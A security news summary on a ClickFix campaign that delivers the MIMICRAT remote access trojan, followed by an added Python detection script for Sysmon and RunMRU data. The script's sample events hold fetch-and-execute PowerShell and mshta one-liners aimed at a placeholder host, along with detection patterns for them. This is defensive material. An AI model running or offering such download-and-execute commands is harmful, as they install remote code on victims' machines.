ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT RAT
"The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report.
"In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue."
A ClickFix campaign abuses compromised legitimate websites to deliver a previously undocumented remote access trojan tracked as MIMICRAT (aka AstarionRAT). The attack chain is a multi-stage PowerShell sequence that patches ETW and AMSI, drops a Lua-scripted shellcode loader, and installs a C++ RAT supporting Windows token impersonation, SOCKS5 tunneling, and 22 post-exploitation commands. Command-and-control traffic rides HTTPS on port 443 with HTTP profiles built to resemble web analytics traffic. In the observed chain, the operators injected malicious JavaScript into a compromised BIN validation site so that it loaded an externally hosted PHP lure, which displays a fake Cloudflare verification page and instructs the visitor to paste a command into the Windows Run dialog. Because the victim launches that command from the Run dialog, the first process in the chain is spawned by explorer.exe, which is the point defenders can hunt for. The campaign overlaps with Matanbuchus 3.0 loader activity and is likely a precursor to ransomware deployment or data exfiltration.
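The Run-dialog step is where this chain is most visible on the endpoint. The following is an added example, not code from Elastic Security Labs, The Hacker News or the campaign itself: it scores Sysmon Event ID 1 style process-creation records for an interpreter spawned by explorer.exe together with download-and-execute traits, decodes any -EncodedCommand argument (base64 of UTF-16LE) before scoring, and reads back what the user typed into Win+R from the RunMRU registry key. Field names follow Sysmon; the sample events, the RunMRU data and the hostname verify.example.invalid are constructed placeholders, not campaign infrastructure.

```python
"""ClickFix triage helpers: flag Run-dialog interpreter launches in Sysmon data and
recover Run-dialog history from RunMRU.

Added example; not code from Elastic Security Labs, The Hacker News or the campaign.
Assumptions: Sysmon Event ID 1 records are reduced to dicts with ParentImage, Image
and CommandLine; RunMRU is a dict of value name -> data exported from
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
All sample data below is constructed; verify.example.invalid is a placeholder.
"""
import base64
import binascii
import ntpath
import re

# Interpreters a ClickFix lure asks the victim to paste into Win+R. The Run dialog
# is hosted by explorer.exe, so the pasted command starts with explorer.exe as parent.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# -EncodedCommand and the common unambiguous prefixes PowerShell accepts for it.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Command-line traits of a download-and-execute one-liner.
TRAITS = {
    "encoded_command": ENC_RE,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download": re.compile(r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|"
                           r"downloadstring|\bcurl\b", re.I),
    "execute_text": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def assess(record):
    """Score one process-creation record. Returns (flagged, reasons)."""
    parent = ntpath.basename(record.get("ParentImage", "")).lower()
    image = ntpath.basename(record.get("Image", "")).lower()
    cmdline = record.get("CommandLine", "")
    reasons = []
    from_shell = parent == "explorer.exe" and image in INTERPRETERS
    if from_shell:
        reasons.append("interpreter spawned by explorer.exe (Run dialog or shell)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("decoded -EncodedCommand: " + decoded)
    # Look for traits in the raw command line and in the decoded payload.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in TRAITS.items() if rx.search(text)]
    reasons.extend("trait: " + name for name in hits)
    # explorer.exe -> powershell.exe on its own is normal (shortcut, .ps1 double-click);
    # flag only when the launch also carries download/execute traits.
    return from_shell and bool(hits), reasons


def find_clickfix(records):
    """Return [(index, reasons)] for records that look like a ClickFix launch."""
    out = []
    for i, rec in enumerate(records):
        flagged, reasons = assess(rec)
        if flagged:
            out.append((i, reasons))
    return out


def run_history(runmru):
    """Return Run-dialog history, most recent first.

    Windows keeps each entry in a single-letter value suffixed with the two
    characters '\\1' and orders them through MRUList (most recent letter first).
    """
    order = runmru.get("MRUList", "")
    return [runmru[c].removesuffix("\\1") for c in order if c in runmru]


# Constructed sample data (not from the campaign).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LURE_PAYLOAD = "iex (irm https://verify.example.invalid/cf)"
ENCODED = base64.b64encode(LURE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\Users\alice\tidy.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "irm https://verify.example.invalid/cf | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -nop -enc " + ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/cf.hta"},
]

SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm https://verify.example.invalid/cf | iex"\\1',
    "c": "regedit\\1",
    "MRUList": "bca",
}

if __name__ == "__main__":
    for i, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
    print("Run history:", run_history(SAMPLE_RUNMRU))
```

Events 3, 4 and 5 are flagged; event 1 (explorer.exe launching a local script) is not, because an explorer-spawned interpreter by itself is routine and only the download-and-execute traits make it a ClickFix candidate. On a live host the same logic applies to Sysmon or EDR process telemetry, and the RunMRU walk gives the incident responder the exact text the victim pasted even after the process has exited.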
Read at The Hacker News